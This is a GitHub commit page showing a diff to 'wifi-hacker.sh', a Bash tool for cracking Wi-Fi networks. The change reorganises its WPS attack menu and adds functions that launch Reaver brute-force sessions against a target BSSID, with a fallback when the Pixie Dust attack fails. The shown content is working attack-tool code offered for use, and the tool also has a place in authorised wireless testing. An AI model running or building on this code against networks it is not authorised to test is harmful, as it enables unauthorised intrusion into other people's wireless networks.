Skip to content

Commit

Permalink
Updated Reaver and PixieDust Options
Browse files Browse the repository at this point in the history
Added "reaverMenuAttacksWPS" and "reaverSessionComplete" Functions
  • Loading branch information
esc0rtd3w committed Jan 4, 2017
1 parent 4bf6af8 commit f9505ea
Showing 1 changed file with 67 additions and 10 deletions.
77 changes: 67 additions & 10 deletions wifi-hacker.sh
Original file line number Diff line number Diff line change
Expand Up @@ -4743,32 +4743,88 @@ menuAttacksWPS(){
#read pause
#pixieFailed="1"

reaverSessionComplete

case "$pixieFailed" in

"1")
$red
echo ""
echo ""
banner
bannerStats
echo "Pixie Attack Failed! Starting Normal Reaver Attack"
echo ""
#echo ""
echo ""
$white
$reaver -i $interfaceMonitor -b $bssid -c $channel -S -vv
reaverMenuAttacksWPS
;;

esac
;;

"2")
#echo "PixeDust Disabled"
$reaver -i $interfaceMonitor -b $bssid -c $channel -S -vv
#$reaver -i $interfaceMonitor -b $bssid -c $channel -S -vv
#$reaver -i $interfaceMonitor -b $bssid -c $channel -vv
#read pause

reaverMenuAttacksWPS
;;

esac

}


reaverMenuAttacksWPS(){

currentTask="reaverMenuAttacksWPS"

banner
bannerStats

sleepMessage1="Preparing Reaver Session...."
sleepMessage2="Launching Reaver Session...."
sleepMessage3="Reaver Session Is Now Active!"

sleepMessage="$sleepMessage1"
doSleepMessage
sleep 1

killAirodump

disableChannelHopping

sleepMessage="$sleepMessage1"
doSleepMessage
sleep 1

sleepMessage="$sleepMessage2"
doSleepMessage
sleep 2

banner
bannerStats

sleepMessage="$sleepMessage3"
$green
doSleepMessage
$white
echo ""
echo "Press CTRL+C At Any Time To Stop Current Session and Save"
sleep 2

$reaver -i $interfaceMonitor -b $bssid -c $channel -S -vv

# Set pixieChoice To 0 For Triggering Normal Reaver Save Session Screen
pixieChoice="0"

reaverSessionComplete

}


reaverSessionComplete(){

currentTask="reaverSessionComplete"

# Session has ended lands here
getBSSIDCharOnly
reaverSaveCurrentSessionFile
Expand Down Expand Up @@ -4838,17 +4894,18 @@ menuAttacksWPS(){
echo "Pixie Attack Failed! Starting Normal Reaver Attack"
echo ""
echo ""

$reaver -i $interfaceMonitor -b $bssid -c $channel -S -vv
$white
reaverMenuAttacksWPS
;;

esac
;;

esac

}
menuMain

}

menuAttacksWPSWifiteAuto(){

Expand Down

0 comments on commit f9505ea

Please sign in to comment.